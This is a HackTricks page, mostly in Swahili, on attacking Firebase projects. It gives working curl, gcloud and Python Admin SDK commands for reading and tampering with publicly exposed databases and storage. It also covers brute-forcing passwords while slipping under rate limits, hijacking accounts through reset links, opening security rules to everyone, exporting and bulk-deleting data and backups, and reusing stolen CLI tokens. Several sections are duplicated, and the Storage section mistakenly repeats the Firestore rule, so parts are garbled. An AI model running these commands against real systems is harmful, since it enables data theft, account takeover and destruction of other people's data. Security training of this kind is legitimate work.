GCP - Firebase Privesc

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Firebase

Unauthenticated access to Firebase Realtime Database

Mshambulizi haitaji ruhusa maalum za Firebase kutekeleza shambulio hili. Inahitaji tu kuwepo kwa konfigurishaji dhaifu katika security rules za Firebase Realtime Database, ambapo kanuni zimewekwa na .read: true au .write: true, zikiruhusu ufikaji wa kusoma au kuandika kwa umma.

Mshambulizi lazima atambue database URL, ambayo kwa kawaida inafuata muundo: https://<project-id>.firebaseio.com/.

URL hii inaweza kupatikana kupitia mobile application reverse engineering (decompiling Android APKs or analyzing iOS apps), kupitia uchambuzi wa configuration files kama google-services.json (Android) au GoogleService-Info.plist (iOS), kupitia ukaguzi wa source code wa web applications, au kupitia kuchunguza network traffic ili kutambua requests kwa domain za *.firebaseio.com.

Mshambulizi hutambua database URL na kuangalia kama iko wazi kwa umma, kisha anapata data na anaweza kuandika taarifa zenye madhara.

Kwanza, huangalia kama database inaruhusu ufikaji wa kusoma kwa kuongeza .json kwenye URL.

curl https://<project-id>-default-rtdb.firebaseio.com/.json

Ikiwa jibu lina data ya JSON au null (badala ya “Permission Denied”), database inaruhusu read access. Ili kuangalia write access, attacker anaweza kujaribu kutuma request ya kuandika ya majaribio kutumia Firebase REST API.

curl -X PUT https://<project-id>-default-rtdb.firebaseio.com/test.json -d '{"test": "data"}'

Ikiwa operesheni itafanikiwa, hifadhidata pia inaruhusu ufikiaji wa kuandika.

Ufunuo wa data katika Cloud Firestore

attacker haitaji ruhusa maalum za Firebase ili kufanikisha shambulio hili. Inahitaji tu kuwepo kwa usanidi uliodhoofishwa katika kanuni za usalama za Cloud Firestore ambapo kanuni zinaruhusu ufikiaji wa kusoma au kuandika bila uthibitishaji au kwa uthibitishaji usio wa kutosha. Mfano wa kanuni iliyopangwa vibaya ambayo inatoa ufikiaji kamili ni:

service cloud.firestore {
match /databases/{database}/documents/{document=**} {
allow read, write: if true;
}
}

Kanuni hii inaruhusu mtu yeyote kusoma na kuandika nyaraka zote bila vizuizi vyovyote.

Kanuni za Firestore ni za kina na zinafanya kazi kwa kila collection na document, hivyo kosa katika kanuni maalum linaweza kufichua tu collections fulani.

Mshambulizi lazima atambue Firebase Project ID, ambayo inaweza kupatikana kupitia mobile app reverse engineering, uchambuzi wa faili za usanidi kama google-services.json au GoogleService-Info.plist, kukagua msimbo wa chanzo wa web applications, au kuchambua trafiki ya mtandao ili kutambua maombi kwa firestore.googleapis.com.

The Firestore REST API uses the format:

https://firestore.googleapis.com/v1/projects/<PROJECT_ID>/databases/(default)/documents/<collection>/<document>

Ikiwa sheria zinaruhusu ufikiaji wa kusoma bila uthibitisho, mshambuliaji anaweza kusoma collections na documents. Kwanza, wanajaribu kupata collection maalum:

curl https://firestore.googleapis.com/v1/projects/<PROJECT_ID>/databases/(default)/documents/<collection>

Ikiwa majibu yanajumuisha nyaraka za JSON badala ya kosa la ruhusa, mkusanyiko umefunuliwa. Mshambulizi anaweza kuorodhesha mikusanyiko yote inayoweza kufikiwa kwa kujaribu majina ya kawaida au kuchambua muundo wa programu. Ili kufikia hati maalum:

curl https://firestore.googleapis.com/v1/projects/<PROJECT_ID>/databases/(default)/documents/<collection>/<document>

Ikiwa kanuni zinaruhusu ufikiaji wa kuandika bila kuthibitishwa au zina uhakiki duni, mshambuliaji anaweza kuunda nyaraka mpya:

curl -X POST https://firestore.googleapis.com/v1/projects/<PROJECT_ID>/databases/(default)/documents/<collection> \
-H "Content-Type: application/json" \
-d '{
"fields": {
"name": {"stringValue": "Test"},
"email": {"stringValue": "test@example.com"}
}
}'

Ili kubadilisha hati iliyopo, tumia PATCH:

curl -X PATCH https://firestore.googleapis.com/v1/projects/<PROJECT_ID>/databases/(default)/documents/users/<user-id> \
-H "Content-Type: application/json" \
-d '{
"fields": {
"role": {"stringValue": "admin"}
}
}'

Ili kufuta hati na kusababisha kukatizwa kwa huduma:

curl -X DELETE https://firestore.googleapis.com/v1/projects/<PROJECT_ID>/databases/(default)/documents/<collection>/<document>

Ufichuzi wa faili katika Firebase Storage

Mshambuliaji hahitaji ruhusa maalum za Firebase kutekeleza shambulio hili. Inahitaji tu kuwepo kwa usanidi ulio hatarini katika kanuni za usalama za Firebase Storage ambapo kanuni huruhusu ufikiaji wa kusoma au kuandika bila uthibitisho au kwa uhakiki usio wa kutosha. Kanuni za Storage zinadhibiti ruhusa za kusoma na kuandika kwa kujitegemea, hivyo kosa katika kanuni unaweza kufichua ufikiaji wa kusoma tu, ufikiaji wa kuandika tu, au vyote viwili. Mfano wa kanuni iliyopangwa vibaya inayotoa ufikiaji kamili ni:

service cloud.firestore {
match /databases/{database}/documents/{document=**} {
allow read, write: if true;
}
}

Sheria hii inaruhusu ufikaji wa kusoma na kuandika kwa documents zote bila vikwazo vyovyote. Firestore rules ni za undani (granular) na zinawekwa kwa collection na document, hivyo kosa katika rule maalum linaweza kufichua collections fulani pekee. Mshambuliaji lazima aitambue Firebase Project ID, ambayo inaweza kupatikana kupitia mobile application reverse engineering, uchambuzi wa faili za kusanidi kama google-services.json au GoogleService-Info.plist, ukaguzi wa chanzo cha web application, au network traffic analysis ili kutambua requests kwa firestore.googleapis.com. The Firestore REST API uses the format:https://firestore.googleapis.com/v1/projects/<PROJECT_ID>/databases/(default)/documents/<collection>/<document>.

Ikiwa rules zinaruhusu ufikaji wa kusoma bila uthibitishaji (unauthenticated read access), mshambuliaji anaweza kusoma collections na documents. Kwanza, wanajaribu kufikia collection maalum.

curl "https://firebasestorage.googleapis.com/v0/b/<bucket>/o"
curl "https://firebasestorage.googleapis.com/v0/b/<bucket>/o?prefix=<path>"

Ikiwa jibu linaorodhesha faili badala ya kosa la ruhusa, faili hizo zimefunuliwa. Mshambuliaji anaweza kuona yaliyomo ya faili kwa kutaja njia zao:

curl "https://firebasestorage.googleapis.com/v0/b/<bucket>/o/<urlencode(path)>"

Ikiwa sheria zinaruhusu ufikiaji wa kuandika bila uthibitisho au zina ukaguzi mdogo, mshambuliaji anaweza kupakia faili hatarishi. Ili kupakia faili kupitia REST API:

curl -X POST "https://firebasestorage.googleapis.com/v0/b/<bucket>/o?name=<path>" \
-H "Content-Type: <content-type>" \
--data-binary @<local-file>

The attacker anaweza upload code shells, malware payloads, au faili kubwa ili kusababisha denial of service. Ikiwa application inashughulikia au inatekeleza uploaded files, the attacker anaweza kupata remote code execution. Ili kufuta faili na kusababisha denial of service:

curl -X DELETE "https://firebasestorage.googleapis.com/v0/b/<bucket>/o/<path>"

Kuitisha Cloud Functions za Firebase zinazopatikana kwa umma

Mshambuliaji hahitaji kibali maalum cha Firebase ili kutumia tatizo hili; inahitaji tu kwamba Cloud Function inapatikana kwa umma kupitia HTTP bila uthibitisho.

Function iko hatarini inapopangwa kwa njia isiyo salama:

• Inatumia functions.https.onRequest, ambayo haitekelezi uthibitisho (tofauti na onCall functions).
• Msimbo wa function hauhakiki uthibitisho wa mtumiaji (mfano, hakuna ukaguzi wa request.auth au context.auth).
• Function inapatikana hadharani katika IAM, ikimaanisha allUsers wana jukumu roles/cloudfunctions.invoker. Hali hii ni tabia ya kawaida kwa HTTP functions isipokuwa msanidi programu amezuia ufikiaji.

Firebase HTTP Cloud Functions zinapatikana kupitia URL zifuatazo:

• https://<region>-<project-id>.cloudfunctions.net/<function-name>
• https://<project-id>.web.app/<function-name> (when integrated with Firebase Hosting)

Mshambuliaji anaweza kugundua URL hizi kupitia source code analysis, network traffic inspection, enumeration tools, au mobile app reverse engineering. Iwapo function imefunuliwa kwa umma na haijatakiwa uthibitisho, mshambuliaji anaweza kuikitisha moja kwa moja bila credentials.

# Invoke public HTTP function with GET
curl "https://<region>-<project-id>.cloudfunctions.net/<function-name>"
# Invoke public HTTP function with POST and data
curl -X POST "https://<region>-<project-id>.cloudfunctions.net/<function-name>" \
-H "Content-Type: application/json" \
-d '{"param1": "value1", "param2": "value2"}'

If the function does not properly validate inputs, the attacker may attempt other attacks such as code injection or command injection.

Brute-force attack against Firebase Authentication with a weak password policy

Mshambuliaji hapitaji ruhusa maalum za Firebase ili kutekeleza shambulio hili. Inahitaji tu kwamba Firebase API Key imefunuliwa katika mobile au web applications, na kwamba password policy haijasanidiwa na mahitaji makali zaidi kuliko defaults.

Mshambuliaji lazima aibue Firebase API Key, ambayo inaweza kupatikana kupitia mobile app reverse engineering, uchambuzi wa configuration files kama google-services.json au GoogleService-Info.plist, ukaguzi wa source code wa web applications (mfano, katika bootstrap.js), au uchambuzi wa network traffic.

Firebase Authentication’s REST API inatumia endpoint: https://identitytoolkit.googleapis.com/v1/accounts:signInWithPassword?key=<API_KEY> kuthibitisha kwa kutumia email na password.

Ikiwa Email Enumeration Protection imezimwa, API error responses zinaweza kufunua ikiwa email ipo kwenye mfumo (EMAIL_NOT_FOUND vs. INVALID_PASSWORD), ambayo inamruhusu mshambuliaji kuorodhesha watumiaji kabla ya kujaribu kukisia password. Wakati kinga hii imewezeshwa, API hurudisha ujumbe huo huo wa kosa kwa barua pepe zisizopo na password zisizo sahihi, kuzuia user enumeration.

Ni muhimu kutambua kwamba Firebase Authentication inatekeleza rate limiting, ambayo inaweza kuzuia requests ikiwa jaribio nyingi za authentication zitafanywa kwa muda mfupi. Kwa hiyo, mshambuliaji angehitaji kuongeza ucheleweshaji kati ya jaribio ili kuepuka kuwekewa rate limit.

Mshambuliaji anabaini API Key na anafanya jaribio za authentication kwa kutumia password nyingi dhidi ya akaunti zinazojulikana. Ikiwa Email Enumeration Protection imezimwa, mshambuliaji anaweza kuorodhesha watumiaji walio katika mfumo kwa kuchambua error responses:

# Attempt authentication with a known email and an incorrect password
curl -X POST "https://identitytoolkit.googleapis.com/v1/accounts:signInWithPassword?key=<API_KEY>" \
-H "Content-Type: application/json" \
-d '{
"email": "usuario@example.com",
"password": "password",
"returnSecureToken": true
}'

Ikiwa majibu yanajumuisha EMAIL_NOT_FOUND, barua pepe haipo kwenye mfumo. Ikiwa yanajumuisha INVALID_PASSWORD, barua pepe ipo lakini nenosiri si sahihi, ikithibitisha kwamba mtumiaji ameandikishwa. Mara mtumiaji halali anapotambuliwa, mshambuliaji anaweza kufanya jaribio za brute-force. Ni muhimu kujumuisha mapumziko kati ya jaribio ili kuepuka mekanizimu za ukomo wa maombi za Firebase Authentication:

counter=1
for password in $(cat wordlist.txt); do
echo "Intento $counter: probando contraseña '$password'"
response=$(curl -s -X POST "https://identitytoolkit.googleapis.com/v1/accounts:signInWithPassword?key=<API_KEY>" \
-H "Content-Type: application/json" \
-d "{\"email\":\"usuario@example.com\",\"password\":\"$password\",\"returnSecureToken\":true}")

if echo "$response" | grep -q "idToken"; then
echo "Contraseña encontrada: $password (intento $counter)"
break
fi

# Stop for the rate limiting
sleep 1
counter=$((counter + 1))
done

With the default password policy (minimum 6 characters, no complexity requirements), the attacker can try all possible combinations of 6-character passwords, which represents a relatively small search space compared to stricter password policies.

Usimamizi wa watumiaji katika Firebase Authentication

Mshambuliaji anahitaji ruhusa maalum za Firebase Authentication ili kufanikisha shambulio hili. Ruhusa zinazohitajika ni:

• firebaseauth.users.create to create users
• firebaseauth.users.update to modify existing users
• firebaseauth.users.delete to delete users
• firebaseauth.users.get to retrieve user information
• firebaseauth.users.sendEmail to send emails to users
• firebaseauth.users.createSession to create user sessions

Ruhusa hizi zimo katika jukumu la roles/firebaseauth.admin, ambalo linatoa ufikiaji kamili wa kusoma/kuandika kwa rasilimali za Firebase Authentication. Pia zipo katika majukumu ya ngazi ya juu kama roles/firebase.developAdmin (which includes all firebaseauth.* permissions) na roles/firebase.admin (full access to all Firebase services).

Kutumia Firebase Admin SDK, mshambuliaji atahitaji kupata cheti za akaunti ya huduma (faili ya JSON), ambavyo vinaweza kupatikana kwenye mifumo iliyovamiwa, hazina za msimbo zilizo wazi kwa umma, mifumo ya CI/CD iliyovamiwa, au kupitia uvamizi wa akaunti za watengenezaji ambazo zina ufikiaji wa cheti hivi.

Hatua ya kwanza ni kusanidi Firebase Admin SDK kwa kutumia cheti za akaunti ya huduma.

import firebase_admin
from firebase_admin import credentials, auth
cred = credentials.Certificate('path/to/serviceAccountKey.json')
firebase_admin.initialize_app(cred)

Ili kuunda mtumiaji hasidi akitumia victim’s email, the attacker angejaribu kutumia Firebase Admin SDK kutengeneza akaunti mpya chini ya barua pepe hiyo.

user = auth.create_user(
email='victima@example.com',
email_verified=False,
password='password123',
display_name='Usuario Malicioso',
disabled=False
)
print(f'Usuario creado: {user.uid}')

Ili kubadilisha mtumiaji aliyepo, mshambuliaji atasasisha sehemu kama anwani ya barua pepe, hali ya uthibitisho, au ikiwa akaunti imelemazwa.

user = auth.update_user(
uid,
email='nuevo-email@example.com',
email_verified=True,
disabled=False
)
print(f'Usuario actualizado: {user.uid}')

Ili kufuta akaunti ya mtumiaji na kusababisha denial of service, attacker angewasilisha ombi la kuondoa mtumiaji kabisa.

auth.delete_user(uid)
print('Usuario eliminado exitosamente')

Mshambuliaji anaweza pia kupata taarifa kuhusu watumiaji waliopo kwa kuomba UID yao au anwani ya barua pepe.

user = auth.get_user(uid)
print(f'Información del usuario: {user.uid}, {user.email}')
user = auth.get_user_by_email('usuario@example.com')
print(f'Información del usuario: {user.uid}, {user.email}')

Zaidi ya hayo, mshambuliaji anaweza kutengeneza viungo vya uthibitisho au viungo vya kuweka upya nywila ili kubadilisha nywila ya mtumiaji na kupata ufikiaji wa akaunti yao.

link = auth.generate_email_verification_link(email)
print(f'Link de verificación: {link}')
link = auth.generate_password_reset_link(email)
print(f'Link de reset: {link}')

Usimamizi wa watumiaji katika Firebase Authentication

Mshambuliaji anahitaji ruhusa maalum za Firebase Authentication ili kutekeleza shambulio hili. Ruhusa zinazohitajika ni:

• firebaseauth.users.create kwa kuunda watumiaji
• firebaseauth.users.update kwa kubadilisha watumiaji waliopo
• firebaseauth.users.delete kwa kufuta watumiaji
• firebaseauth.users.get kwa kupata taarifa za watumiaji
• firebaseauth.users.sendEmail kwa kutuma barua pepe kwa watumiaji
• firebaseauth.users.createSession kwa kuunda vikao vya watumiaji

Ruhusa hizi zipo katika role ya roles/firebaseauth.admin, ambayo inatoa ufikiaji kamili wa kusoma/kuandika kwa rasilimali za Firebase Authentication. Pia ni sehemu ya role za ngazi ya juu kama roles/firebase.developAdmin (ambayo inajumuisha ruhusa zote za firebaseauth.*) na roles/firebase.admin (ufikiaji kamili kwa huduma zote za Firebase).

Ili kutumia Firebase Admin SDK, mshambuliaji angehitaji kupata cheti za akaunti ya huduma (faili ya JSON), ambazo zinaweza kupatikana kutoka kwa mifumo iliyovamiwa, repozitori za msimbo zilizo wazi hadharani, mazingira ya CI/CD yaliyovamiwa, au kupitia uvamizi wa akaunti za watengenezaji zinazokuwa na ufikiaji wa cheti hizi.

Hatua ya kwanza ni kusanidi Firebase Admin SDK kwa kutumia cheti za akaunti ya huduma.

import firebase_admin
from firebase_admin import credentials, auth
cred = credentials.Certificate('path/to/serviceAccountKey.json')
firebase_admin.initialize_app(cred)

Ili kuunda malicious user kwa kutumia email ya mwathiriwa, attacker angejaribu kuunda new user account kwa kutumia email hiyo, akiwekea password na profile information yake mwenyewe.

user = auth.create_user(
email='victima@example.com',
email_verified=False,
password='password123',
display_name='Usuario Malicioso',
disabled=False
)
print(f'Usuario creado: {user.uid}')

Ili kubadilisha mtumiaji aliyepo, mshambuliaji atabadilisha mashamba kama vile anwani ya barua pepe, hali ya uthibitisho, au kama akaunti imelemazwa.

user = auth.update_user(
uid,
email='nuevo-email@example.com',
email_verified=True,
disabled=False
)
print(f'Usuario actualizado: {user.uid}')

Ili kufuta akaunti ya mtumiaji—kwa ufanisi kusababisha denial of service—mshambuliaji angewasilisha ombi la kuondoa mtumiaji huyo kwa kudumu.

auth.delete_user(uid)
print('Usuario eliminado exitosamente')

Mshambuliaji pia anaweza kupata taarifa kuhusu watumiaji waliopo, kama UID yao au anwani yao ya barua pepe, kwa kuomba maelezo ya mtumiaji kwa UID au kwa anwani ya barua pepe.

user = auth.get_user(uid)
print(f'Información del usuario: {user.uid}, {user.email}')
user = auth.get_user_by_email('usuario@example.com')
print(f'Información del usuario: {user.uid}, {user.email}')

Zaidi ya hayo, mshambuliaji anaweza kuunda viungo vya uthibitisho au viungo vya kuweka upya nenosiri, akijiruhusu kubadilisha nenosiri la mtumiaji na kuchukua udhibiti wa akaunti.

link = auth.generate_email_verification_link(email)
print(f'Link de verificación: {link}')
link = auth.generate_password_reset_link(email)
print(f'Link de reset: {link}')

Modification of security rules in Firebase services

Mshambuliaji anahitaji ruhusa maalum kubadilisha sheria za usalama kulingana na huduma. Kwa Cloud Firestore na Firebase Cloud Storage, ruhusa zinazohitajika ni firebaserules.rulesets.create ili kuunda rulesets na firebaserules.releases.create ili kuzindua releases. Ruhusa hizi zimo katika jukumu la roles/firebaserules.admin au katika majukumu ya ngazi ya juu kama roles/firebase.developAdmin na roles/firebase.admin. Kwa Firebase Realtime Database, ruhusa inayohitajika ni firebasedatabase.instances.update.

Mshambuliaji lazima atumie Firebase REST API kubadilisha sheria za usalama. Kwanza, mshambuliaji atahitaji kupata an access token using service account credentials. Ili kupata access token:

gcloud auth activate-service-account --key-file=path/to/serviceAccountKey.json
ACCESS_TOKEN=$(gcloud auth print-access-token)

Ili kubadilisha kanuni za Firebase Realtime Database:

curl -X PUT "https://<project-id>-default-rtdb.firebaseio.com/.settings/rules.json?access_token=$ACCESS_TOKEN" \
-H "Content-Type: application/json" \
-d '{
"rules": {
".read": true,
".write": true
}
}'

Ili kubadilisha Cloud Firestore rules, mshambuliaji lazima aunde ruleset kisha kui-deploy:

curl -X POST "https://firebaserules.googleapis.com/v1/projects/<project-id>/rulesets" \
-H "Authorization: Bearer $ACCESS_TOKEN" \
-H "Content-Type: application/json" \
-d '{
"source": {
"files": [{
"name": "firestore.rules",
"content": "rules_version = '\''2'\'';\nservice cloud.firestore {\n  match /databases/{database}/documents {\n    match /{document=**} {\n      allow read, write: if true;\n    }\n  }\n}"
}]
}
}'

Amri iliyotangulia inarudisha jina la ruleset kwa muundo projects//rulesets/. Ili kupeleka toleo jipya, release lazima irekebishwe kwa kutumia ombi la PATCH:

curl -X PATCH "https://firebaserules.googleapis.com/v1/projects/<project-id>/releases/cloud.firestore" \
-H "Authorization: Bearer $ACCESS_TOKEN" \
-H "Content-Type: application/json" \
-d '{
"release": {
"name": "projects/<project-id>/releases/cloud.firestore",
"rulesetName": "projects/<project-id>/rulesets/<ruleset-id>"
}
}'

Ili kubadilisha sheria za Firebase Cloud Storage:

curl -X POST "https://firebaserules.googleapis.com/v1/projects/<project-id>/rulesets" \
-H "Authorization: Bearer $ACCESS_TOKEN" \
-H "Content-Type: application/json" \
-d '{
"source": {
"files": [{
"name": "storage.rules",
"content": "service firebase.storage {\n  match /b/{bucket}/o {\n    match /{allPaths=**} {\n      allow read, write: if true;\n    }\n  }\n}"
}]
}
}'

Amri iliyopita inarudisha jina la ruleset kwa muundo projects//rulesets/. Ili kupeleka toleo jipya, release lazima isasishwe kwa kutumia ombi la PATCH:

curl -X PATCH "https://firebaserules.googleapis.com/v1/projects/<project-id>/releases/firebase.storage/<bucket-id>" \
-H "Authorization: Bearer $ACCESS_TOKEN" \
-H "Content-Type: application/json" \
-d '{
"release": {
"name": "projects/<project-id>/releases/firebase.storage/<bucket-id>",
"rulesetName": "projects/<project-id>/rulesets/<ruleset-id>"
}
}'

Utoaji na urekebishaji wa data katika Cloud Firestore

Cloud Firestore inatumia miundombinu na mfumo wa ruhusa ule ule kama Cloud Datastore, kwa hivyo ruhusa za Datastore IAM zinatumika moja kwa moja kwenye Firestore. Ili kubadilisha sera za TTL, ruhusa ya datastore.indexes.update inahitajika. Ili kuhamisha data, ruhusa ya datastore.databases.export inahitajika. Ili kuingiza data, ruhusa ya datastore.databases.import inahitajika. Ili kufanya ufutaji mkubwa wa data, ruhusa ya datastore.databases.bulkDelete inahitajika.

Kwa operesheni za backup na restore, ruhusa maalum zinahitajika:

• datastore.backups.get and datastore.backups.list kuorodhesha na kupata maelezo ya chelezo zinazopatikana
• datastore.backups.delete kufuta chelezo
• datastore.backups.restoreDatabase kurejesha database kutoka kwa chelezo
• datastore.backupSchedules.create and datastore.backupSchedules.delete kusimamia ratiba za chelezo

Wakati sera ya TTL inapotengenezwa, mali iliyoteuliwa huchaguliwa kutambua entiti zinazostahili kufutwa. Mali hii ya TTL lazima iwe ya aina ya Tarehe na Wakati. Mshambuliaji anaweza kuchagua mali ambayo tayari ipo au kuweka mali ambayo anapanga kuongeza baadaye. Ikiwa thamani ya uwanja ni tarehe iliyopita, hati inakuwa inayostahili kufutwa mara moja. Mshambuliaji anaweza kutumia gcloud CLI kubadilisha sera za TTL.

# Enable TTL
gcloud firestore fields ttls update expireAt \
--collection-group=users \
--enable-ttl
# Disable TTL
gcloud firestore fields ttls update expireAt \
--collection-group=users \
--disable-ttl

Ili kuhamisha data na exfiltrate, mshambulizi anaweza kutumia gcloud CLI.

gcloud firestore export gs://<bucket-name> --project=<project-id> --async --database='(default)'

Ili kuingiza data hasidi:

gcloud firestore import gs://<bucket-name>/<path> --project=<project-id> --async --database='(default)'

Ili kufuta data kwa wingi na kusababisha denial of service, mshambuliaji anaweza kutumia zana ya gcloud Firestore bulk-delete kuondoa collections zote.

gcloud firestore bulk-delete \
--collection-ids=users,posts,messages \
--database='(default)' \
--project=<project-id>

Kwa shughuli za backup na urejeshaji, mshambuliaji anaweza kuunda backups zilizopangwa ili kunasa hali ya sasa ya hifadhidata, kuorodhesha backups zilizopo, kurejesha kutoka kwa backup ili kuandika juu ya mabadiliko ya hivi karibuni, kufuta backups ili kusababisha upotevu wa data kwa kudumu, na kuondoa backups zilizopangwa. Ili kuunda ratiba ya backups kila siku ambayo inazalisha backup mara moja:

gcloud firestore backups schedules create \
--database='(default)' \
--recurrence=daily \
--retention=14w \
--project=<project-id>

Ili kurejesha kutoka kwenye chelezo maalum, mshambuliaji anaweza kuunda hifadhidata mpya kwa kutumia data iliyomo katika chelezo hilo. Operesheni ya kurejesha inaandika data ya chelezo katika hifadhidata mpya, ikimaanisha kwamba DATABASE_ID iliyopo haiwezi kutumika.

gcloud firestore databases restore \
--source-backup=projects/<project-id>/locations/<location>/backups/<backup-id> \
--destination-database='<new-database-id>' \
--project=<project-id>

Ili kufuta backup na kusababisha upotevu wa kudumu wa data:

gcloud firestore backups delete \
--backup=<backup-id> \
--project=<project-id>

Uibi na matumizi mabaya ya Firebase CLI cheti

Mvamizi hahitaji ruhusa maalumu za Firebase kutekeleza shambulio hili, lakini anahitaji upatikanaji wa mfumo wa kienyeji wa msanidi au wa faili la cheti za Firebase CLI. Cheti hizi zinawekwa katika faili la JSON lililoko kwenye:

• Linux/macOS: ~/.config/configstore/firebase-tools.json

• Windows: C:\Users[User].config\configstore\firebase-tools.json

Faili hii ina authentication tokens, ikiwa ni pamoja na refresh_token na access_token, ambazo zimemruhusu mvamizi kujithibitisha kama mtumiaji aliyewahi kuendesha firebase login.

Mvamizi anapata upatikanaji wa faili la cheti za Firebase CLI. Kisha anaweza kunakili faili nzima hadi mfumo wake mwenyewe, na Firebase CLI itatumia kiotomatiki cheti kutoka eneo lake chaguomsingi. Baada ya kufanya hivyo, mvamizi anaweza kuona miradi yote ya Firebase inayopatikana kwa mtumiaji huyo.

firebase projects:list

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.